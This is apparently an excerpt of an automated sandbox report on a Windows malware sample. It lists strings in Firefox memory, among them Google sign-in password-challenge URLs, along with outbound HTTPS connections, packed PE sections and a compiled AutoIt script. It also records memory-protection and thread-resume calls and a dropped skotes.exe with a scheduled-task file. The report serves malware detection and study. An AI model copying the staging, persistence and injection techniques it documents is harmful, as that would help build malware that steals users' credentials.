Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 0000001C.00000003.2760314917.000001DEEFF91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2761194812.000001DEEFF92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/anything/?
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB90C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 0000001C.00000002.3057404604.000001DEEC9BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2877108624.000001DEFA92E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001C.00000003.2920506033.000001DEF1243000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2888648124.000001DEFA2C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2924126002.000001DEF1117000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=ht
Source: firefox.exe, 00000021.00000002.2954944692.000001729E530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
Source: firefox.exe, 0000001F.00000002.2964244095.000001D14E950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig5
Source: firefox.exe, 00000021.00000002.2952438162.000001729E3AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challeng
Source: firefox.exe, 0000001C.00000003.2882299164.000001DEFA5CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2977094837.000001DEDE910000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2799655475.000001DEEF282000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2799655475.000001DEEF2A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2835305075.000001DEEF2A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2835305075.000001DEEF282000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2955897457.000001C8C37B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2955897457.000001C8C37BA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2952085761.000001C8C3734000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964244095.000001D14E954000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2950099066.000001D14E63A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2950099066.000001D14E630000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2954944692.000001729E534000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001C.00000002.2977845893.000001DEDE990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd$
Source: firefox.exe, 0000001A.00000002.2709595092.000001D3FB20A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2715806075.0000021131BA7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2977845893.000001DEDE990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001C.00000002.2980852938.000001DEE03BB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2980852938.000001DEE03F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2955897457.000001C8C37B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2952085761.000001C8C3734000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964244095.000001D14E954000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2950099066.000001D14E630000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2954944692.000001729E534000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49927 version: TLS 1.2

System Summary

.NET source code contains very large array initializations

Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FieldCalculator.cs

Large array initialization: ValidateIntegratedCalculator: array initializer size 361008

Binary is likely a compiled AutoIt script file

Source: 6e1fbaaba5.exe, 0000000F.00000002.2740020659.00000000002F2000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_8af1e4f5-e
Source: 6e1fbaaba5.exe, 0000000F.00000002.2740020659.00000000002F2000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_00cfdb3c-4

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: 98a7b9f337.exe.6.dr	Static PE information: section name:
Source: 98a7b9f337.exe.6.dr	Static PE information: section name: .idata
Source: 98a7b9f337.exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: a6f0d09f38.exe.6.dr	Static PE information: section name:
Source: a6f0d09f38.exe.6.dr	Static PE information: section name: .idata
Source: a6f0d09f38.exe.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: b5da647ae3.exe.6.dr	Static PE information: section name:
Source: b5da647ae3.exe.6.dr	Static PE information: section name: .idata
Source: b5da647ae3.exe.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: 8b82d73f70.exe.6.dr	Static PE information: section name:
Source: 8b82d73f70.exe.6.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06536E50 NtProtectVirtualMemory,	7_2_06536E50
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06538F98 NtResumeThread,	7_2_06538F98
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06536E48 NtProtectVirtualMemory,	7_2_06536E48
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06538F90 NtResumeThread,	7_2_06538F90

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00728860	6_2_00728860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00727049	6_2_00727049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007278BB	6_2_007278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00722D10	6_2_00722D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006E4DE0	6_2_006E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007231A8	6_2_007231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00717F36	6_2_00717F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006E4B30	6_2_006E4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0072779B	6_2_0072779B
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_0158CB3C	7_2_0158CB3C
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_0158F3B8	7_2_0158F3B8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_0158F3A8	7_2_0158F3A8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C18430	7_2_05C18430
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C1E740	7_2_05C1E740
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C1A1A0	7_2_05C1A1A0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C1B208	7_2_05C1B208
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C1B1F8	7_2_05C1B1F8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C1A190	7_2_05C1A190
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C11068	7_2_05C11068
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C10E71	7_2_05C10E71
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C1F948	7_2_05C1F948
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C10B90	7_2_05C10B90
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C10BA0	7_2_05C10BA0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_05C1EA67	7_2_05C1EA67
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061E77B4	7_2_061E77B4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061E5530	7_2_061E5530
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061E5540	7_2_061E5540
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061F4A68	7_2_061F4A68
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061F3788	7_2_061F3788
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061F63CB	7_2_061F63CB
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061F4A20	7_2_061F4A20
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061F4A58	7_2_061F4A58
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061FB6B8	7_2_061FB6B8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061FB6A7	7_2_061FB6A7
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061F3778	7_2_061F3778
